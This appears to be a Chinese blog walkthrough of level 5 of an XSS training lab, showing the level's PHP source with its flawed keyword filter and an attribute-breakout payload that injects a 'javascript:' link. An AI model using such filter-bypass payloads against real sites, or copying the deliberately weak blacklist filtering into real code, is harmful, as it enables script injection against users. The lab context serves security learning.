XXS level5
2024-08-25 22:30:15
(1)用第四关的方法尝试,发现不行,查看页面源代码,发现on中间有了下划线
(2)查看PHP源代码
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
可见"<script>"以及"on"都被替换了,无法通过鼠标事件进行。考虑下用链接(href),即在链接中调用js.
(3)在输入框输入
"><a href="javascript:alert()">
点击圆圈内的超链接
最新文章
- 使用JS构建简单Map(转)
- 【转】下载量最高的 100 个 Laravel 扩展包推荐
- 数组去重算法,quickSort
- ubuntu bash提示找不到文件或目录
- Mysql 学习记录
- android面试题之三
- Http Post与Get等
- 浅谈如何让 Bootstrap 3兼容IE8浏览器
- jvm内存回收诡异现象
- MEAN 全栈开发 ——实现简单博客
- Git协作流程
- c或c++利用scanf无限输入并进行简单操作如比大小等
- ng7 设置文件路径别名
- 自定义实现HashMap的put、get方法
- linux软件管理 软件安装
- 四:(之八_Linux压力测试工具stress)Dockerfile语法梳理和实践
- Jenkins tomcat打包启动脚本,待完善
- LeetCode 1:1. 两数之和
- Scala之隐式转换implicit详解
- “数学口袋精灵”第二个Sprint计划---第一天
热门文章
- linux ssh root登陆出现错误:Permission denied, please try again
- UVa 10859 - Placing Lampposts 树形DP 难度: 2
- Hive/Hbase/Sqoop的安装教程
- bluemix部署(一)简单测试,搭建样本flask程序。
- 将自己的域名解析跳转到博客主页(GitHub中的gitpage跳转)
- do while
- springMVC拦截css与js等资源文件的解决
- Problem A: 编写函数:三个数的最大最小值
- mvc Model验证总结及常用正则表达式
- C点滴成海------Dev C++怎么修改成简体中文